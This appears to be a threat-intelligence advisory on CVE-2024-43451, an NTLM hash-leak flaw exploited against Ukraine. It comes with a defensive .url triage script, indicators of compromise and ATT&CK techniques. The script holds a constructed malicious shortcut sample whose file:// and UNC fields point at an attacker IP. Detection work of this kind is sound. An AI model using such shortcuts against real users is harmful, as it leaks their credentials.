Russian Hackers Exploit New NTLM Flaw to Deploy RAT Malware via Phishing Emails

Nov. 14, 2024, 7:30 p.m.

Description

A newly discovered vulnerability in Windows NT LAN Manager (NTLM), tracked as CVE-2024-43451, has been exploited by suspected Russian hackers in cyber attacks against Ukraine. The flaw lets an attacker obtain a victim's NTLMv2 authentication response (the Net-NTLMv2 hash) through minimal interaction with a malicious file, such as right-clicking, deleting or moving it, without the file ever being opened. The exploit chain begins with phishing emails that link to compromised Ukrainian government websites, from which the victim downloads a ZIP archive containing a malicious Internet Shortcut (.url) file. When the user interacts with that file, Windows connects to an attacker-controlled server and authenticates with the user's NTLM credentials, exposing the hash; the chain then downloads additional payloads, including the Spark RAT malware. The captured value can be relayed to other services or cracked offline to authenticate as the user (the original reporting describes this stage as pass-the-hash attacks). CERT-UA has attributed the activity to a threat actor tracked as UAC-0194.
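The following Python triage script is an added example, not code from the original advisory or from CERT-UA. It shows the mechanism the description refers to: a .url file is a small INI-style text file, and Explorer resolves fields such as URL=, IconFile= and WorkingDirectory= while merely listing or handling the shortcut. When one of those fields points at a remote UNC or file:// resource, Windows opens an outbound SMB or WebDAV session and authenticates with the user's NTLM credentials, which is the hash-disclosure primitive. The script parses such files, flags remote references, and checks hosts and the file hash against the indicators listed on this page. The two sample files, the internal domain suffix and the file layout are constructed assumptions for the demonstration, not artifacts recovered from the campaign.

```python
import configparser
import hashlib
import ipaddress
import re
from urllib.parse import urlparse

# Indicators copied from this page's Indicators section.
IOC_IPS = {"77.83.172.47", "89.23.101.101", "89.23.102.251", "92.42.96.30", "92.42.96.10"}
IOC_SHA256 = {
    "994fa6d6b44379a8271e0936cf2a2e898de4f720ab8c1fec98be674f20df883d",
    "6ec7f86cc19df1fef8063242ef6861355cc7ed25a669de842e1cda7332eca343",
    "e2ad6fa6dbe71e9ab10dcf3bad4b82538dabe34a3011fdaa2eeb302b67ea776d",
    "34073f2055002791ed3cad21be0e94b33ff4345eab8a5e7801dfdafa7cc2fb99",
    "d6d77204740bd3bdd2fd5e918a7ba9134c1d7d10eb3d6972749009dd50df6cc8",
    "6de2602f486985bfadae3b4ac06af041f22fd41559954a6ecd262f7c3a8aa681",
    "ad10aaac2661b2dd17ef586a2bf8f3dca7a82abda2580dbd3aca2d52cc5460ae",
    "5499a4bf696fdbbe41cdc2bc9efae2df93306a135643a3651701c5ca57570eb7",
    "8cf24fe1384ca8ea763081b78fd14995704bbd73a871ebe1c362053767aeec20",
    "caba3a8900302df5b83d260ed1f4da19b68f8c2d1b92c6dfc91b2ca01f14a1ef",
    "c423ea5a16e33d3b988358ad649bb43a3265cad8e118ed91863d8b9dc3e8f8f9",
    "715a69b898bd0a056098d24505046391e29381f671952d5e860c0cb41779a49f",
    "e4a6368556c15d316960bd605827c00e336ef6e56c369090803a46ff69dfd4ac",
    "928cdef8fb7c2ba9aa96ab726d74aa7a18b032102d9ec4ed00e7559f98c1bdf9",
    "df74298b2ecb33558bd34b7d59bcade5901eb5db1b61ce9aa1ae27e597f4f58d",
    "6c6ba73e4c80853219121f922e60564720d414bf42d8bc542dac800560d1eb36",
    "0efe4a603dd59b377798ae2889fe47a851f79e36d1a925d327a93416204d1767",
    "07b417ffa08f12201eceba3688690bd5c947f657be00e3c883f6ec342ec5c344",
    "aac3f49b8c875ca842f96dd6dde194102944907a956fad1ff1cff14c64aaf2e0",
}

# Assumption: hostnames under this suffix are internal; every other host is external.
INTERNAL_SUFFIX = ".example.local"
# .url fields Explorer resolves while handling the shortcut (configparser lowercases keys).
REMOTE_FIELDS = ("url", "iconfile", "workingdirectory")
UNC_RE = re.compile(r"^\\\\([^\\/?]+)")  # \\host\share\..., incl. \\host@80\DavWWWRoot


def _remote_ref(value):
    """Return (kind, host) when a field value points at a remote resource, else None."""
    v = value.strip()
    m = UNC_RE.match(v)
    if m:
        return "unc", m.group(1)
    p = urlparse(v)
    scheme = p.scheme.lower()
    if scheme in ("file", "smb", "http", "https", "webdav") and p.netloc:
        return scheme, p.netloc
    return None


def _bare_host(host):
    """Strip WebDAV-style @port and :port suffixes, e.g. '89.23.101.101@80' -> the IP."""
    return host.split("@")[0].split(":")[0]


def _is_external(host):
    """Public IPs are external; names are external unless under INTERNAL_SUFFIX (assumption)."""
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        return not host.lower().endswith(INTERNAL_SUFFIX)


def parse_url_shortcut(data):
    """Parse the [InternetShortcut] section into a dict of lowercase field -> value."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, allow_no_value=True)
    cp.read_string(data.decode("utf-8-sig", errors="replace"))
    fields = {}
    for section in cp.sections():
        if section.lower() == "internetshortcut":
            fields.update(cp.items(section))
    return fields


def triage(data):
    """Assess one .url file: remote references, NTLM-leak path, and IOC matches."""
    fields = parse_url_shortcut(data)
    digest = hashlib.sha256(data).hexdigest()
    findings = []
    for field in REMOTE_FIELDS:
        value = fields.get(field)
        ref = _remote_ref(value) if value else None
        if ref is None:
            continue
        kind, host = ref
        bare = _bare_host(host)
        findings.append({
            "field": field,
            "kind": kind,
            "host": bare,
            "external": _is_external(bare),
            # UNC/file/smb references trigger outbound NTLM auth; http(s) is the download stage.
            "ntlm_leak_path": kind in ("unc", "file", "smb"),
            "ioc_ip": bare in IOC_IPS,
        })
    suspicious = any(f["ntlm_leak_path"] and f["external"] or f["ioc_ip"] for f in findings)
    return {"sha256": digest, "ioc_hash_hit": digest in IOC_SHA256,
            "findings": findings, "suspicious": suspicious or digest in IOC_SHA256}


# Constructed samples for demonstration only; not files recovered from the campaign.
BENIGN_URL = b"[InternetShortcut]\r\nURL=https://intranet.example.local/portal\r\nIconIndex=0\r\n"
SUSPECT_URL = (b"[InternetShortcut]\r\n"
               b"URL=file://89.23.101.101/share/update.exe\r\n"
               b"IconFile=\\\\89.23.101.101\\share\\icon.ico\r\n"
               b"IconIndex=1\r\n")

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_URL), ("suspect", SUSPECT_URL)):
        print(name, triage(blob))
```

The benign sample yields a single http(s) reference to an internal host and no alert; the constructed suspect sample yields two external references on the NTLM-leak path, both matching an IP from this page. When running this over a mail gateway's extracted attachments, the hash check is the least durable signal, since attackers rebuild archives freely, while an external UNC or file:// reference inside a .url is worth alerting on regardless of IOC hits; blocking outbound SMB (TCP 445) and WebDAV egress at the perimeter removes the leak path entirely.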

Date

  • Created: Nov. 14, 2024, 11:57 a.m.
  • Published: Nov. 14, 2024, 11:57 a.m.
  • Modified: Nov. 14, 2024, 7:30 p.m.

Indicators

  • 994fa6d6b44379a8271e0936cf2a2e898de4f720ab8c1fec98be674f20df883d
  • 6ec7f86cc19df1fef8063242ef6861355cc7ed25a669de842e1cda7332eca343
  • e2ad6fa6dbe71e9ab10dcf3bad4b82538dabe34a3011fdaa2eeb302b67ea776d
  • 34073f2055002791ed3cad21be0e94b33ff4345eab8a5e7801dfdafa7cc2fb99
  • d6d77204740bd3bdd2fd5e918a7ba9134c1d7d10eb3d6972749009dd50df6cc8
  • 6de2602f486985bfadae3b4ac06af041f22fd41559954a6ecd262f7c3a8aa681
  • ad10aaac2661b2dd17ef586a2bf8f3dca7a82abda2580dbd3aca2d52cc5460ae
  • 5499a4bf696fdbbe41cdc2bc9efae2df93306a135643a3651701c5ca57570eb7
  • 8cf24fe1384ca8ea763081b78fd14995704bbd73a871ebe1c362053767aeec20
  • caba3a8900302df5b83d260ed1f4da19b68f8c2d1b92c6dfc91b2ca01f14a1ef
  • c423ea5a16e33d3b988358ad649bb43a3265cad8e118ed91863d8b9dc3e8f8f9
  • 715a69b898bd0a056098d24505046391e29381f671952d5e860c0cb41779a49f
  • e4a6368556c15d316960bd605827c00e336ef6e56c369090803a46ff69dfd4ac
  • 928cdef8fb7c2ba9aa96ab726d74aa7a18b032102d9ec4ed00e7559f98c1bdf9
  • df74298b2ecb33558bd34b7d59bcade5901eb5db1b61ce9aa1ae27e597f4f58d
  • 6c6ba73e4c80853219121f922e60564720d414bf42d8bc542dac800560d1eb36
  • 0efe4a603dd59b377798ae2889fe47a851f79e36d1a925d327a93416204d1767
  • 07b417ffa08f12201eceba3688690bd5c947f657be00e3c883f6ec342ec5c344
  • aac3f49b8c875ca842f96dd6dde194102944907a956fad1ff1cff14c64aaf2e0
  • 77.83.172.47
  • 89.23.101.101
  • 89.23.102.251
  • 92.42.96.30
  • 92.42.96.10

Attack Patterns

  • Spark RAT (malware)
  • UAC-0194 (threat actor)
  • T1053.005 (Scheduled Task/Job: Scheduled Task)
  • T1574.002 (Hijack Execution Flow: DLL Side-Loading)
  • T1571 (Non-Standard Port)
  • T1547.001 (Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder)
  • T1070.004 (Indicator Removal: File Deletion)
  • T1573 (Encrypted Channel)
  • T1218 (System Binary Proxy Execution)
  • T1105 (Ingress Tool Transfer)
  • T1566.001 (Phishing: Spearphishing Attachment)
  • T1055 (Process Injection)
  • T1219 (Remote Access Software)
  • T1036 (Masquerading)
  • T1204 (User Execution)
  • T1140 (Deobfuscate/Decode Files or Information)
  • T1027 (Obfuscated Files or Information)
  • T1112 (Modify Registry)
  • T1566 (Phishing)
  • T1078 (Valid Accounts)
  • T1059 (Command and Scripting Interpreter)

Additional Information

  • Government
  • Ukraine